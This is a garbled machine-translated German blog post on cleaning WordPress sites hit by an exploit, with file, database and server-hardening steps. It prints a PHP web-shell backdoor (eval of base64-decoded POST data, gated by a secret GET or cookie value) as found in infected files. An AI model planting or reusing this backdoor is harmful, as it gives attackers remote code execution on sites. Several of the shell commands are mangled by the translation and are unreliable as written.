Wordpress Exploit - die kompromittierten Dateien Reinigung und SQL Server-Sicherheit.

Bevor Sie diesen Beitrag lesen, sollten Sie , Um etwas zu verstehen. :)

Wir fanden in mehreren Blogs auf stealthsettings.com Dateien, ähnlich dem folgenden Code virusarii ergeben sich aus den WordPress nutzen.:

<?php if($_GET[‘573abcb060974771’]==”8e96d1b4b674e1d2″){ eval(base64_decode($_POST[‘file'])); Ausfahrt; }?>

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file'])); Ausfahrt; }?>

xmlrpcWenn es oben angegebenen Datei xmlrpc.php von schläfrigAber bei einem grep Server, können Sie sehen, dass es durchaus ein paar seiner Art im Quellcode.

pppffiuuu

Säubern infizierter Dateien:

Ooookkkk ...
1. Die beste Lösung, nachdem sie hatten SicherungskopieGereinigt und der Datenbank ist es, wischen Dateien WordPress (Sie können wp-config.php und Dateien, die sich nicht genau auf der WP-Plattform befinden, nachdem sie sorgfältig geprüft wurden, auf dem Server behalten und in die Originalversion hochladen 2.5.1 (Während dies einen WP Versions-Upgrade :)) http://wordpress.org/download/ . Wischen Sie mit Theme-Dateien, wenn Sie nicht vertrauen, dass ihre sorgfältige Prüfung.

Es scheint betroffen gewesen und Dateien der Themen, die vorher noch nicht auf dem Blog verwendet und einfachen Wechsel des Themas, nicht das Problem lösen.

./andreea/wp-content/themes/default/index.php:<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file'])); Ausfahrt; }?> <? php get_header (); ?>

2. Suchen und löschen Sie alle Dateien, die: * _new.php, * _old.php, * Jpgg, * Giff, * Pngg und Datei wp-info.txt, falls vorhanden....

Zu finden. -Name "* _new.php"
Zu finden. -Name "* _old.php"
Zu finden. -Name "*. Jpgg"
Zu finden. -Name "* _giff"
Zu finden. -Name "* _pngg"
Zu finden. -Name "wp-info.txt"

3. in / Tmp , Suchen und Löschen von Ordnern wie tmpYwbzT2

SQL Reinigung :

1. in Tabelle Tabelle wp_options sehen, ob es die Zeilen löschen wird: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. Auch in wp_options, zu gehen active_plugins und Löschen, wenn ein Plugin, das in einer der Erweiterungen * _new.php, * _old.php, *. jpgg, *. giff, *. pngg oder wenn eine andere Extension vermutet wird, überprüfen sorgfältig endet.

3. In Tabelle wp_users, Anzeigen, wenn ein Benutzer, der nicht irgend etwas in seine rechte geschrieben, die Säule user_nicename. Diesen Benutzer löschen, aber beachten Sie die Nummer auf der ID-Spalte. Dieser Benutzer können "WordPress" als user_login und scheint auf 00 erstellt werden: 00: 00 0000-00-00.

4. Zum Table wp_usermeta und löschen Sie alle Zeilen, die ID oben.

Nachdem Sie diese sql Reinigung getan haben, deaktivieren und aktivieren einige Plugin. (In Blog -> Dashboard -> Plugins)

Secure Server:

1. Siehe, welche Verzeichnisse und Dateien sind "beschreibbar"(Chmod 777) und versuchen, ihnen eine Put- chmod das würde nicht zulassen, dass ihr Schreiben auf jeder Ebene. (644 chmod, zum Beispiel)

Zu finden. -Perm-2-ls

2. Sehen, welche Dateien die Bit gesetzt suid oder sgid . Wenn Sie nicht diese Dateien setzen auf sie chmod 0 oder deinstallieren Sie das Paket, das es enthält. Sind sehr gefährlich, weil sie Privilegien ausführen "Gruppe"Oder"Wurzel"Und nicht mit normalen Benutzerrechten ausgeführt werden, dass die Datei.

find /-type f-perm-04000-ls
find /-type f-perm-02000-ls

3. Prüfen Sie, welche Ports offen sind und versuchen zu schließen oder zu sichern diejenigen, die nicht verwendet werden.

netstat-an | grep-i listen

Darüber. Ich sehe Google-Suche und andere sagen: "Nun hast du!". Nun gut Sie getan haben ... aber was ist, wenn google beginnt zu verbieten alle Standorte Bildung IST SPAM und legte Trojaner (Trojan.Clicker.HTML) in Cookies?

Wordpress Exploit - die kompromittierten Dateien Reinigung und SQL Server-Sicherheit.

Über den Autor

Stealth

Mit Leidenschaft für alles, was Gadget und IT bedeutet, schreibe ich gerne auf stealthsettings.com von 2006 und entdecke gerne mit Ihnen Neues über Computer und MacOS, Linux-Betriebssysteme, Windows, iOS und Android.

Kommentar hinzufügen

Hinterlasse einen Kommentar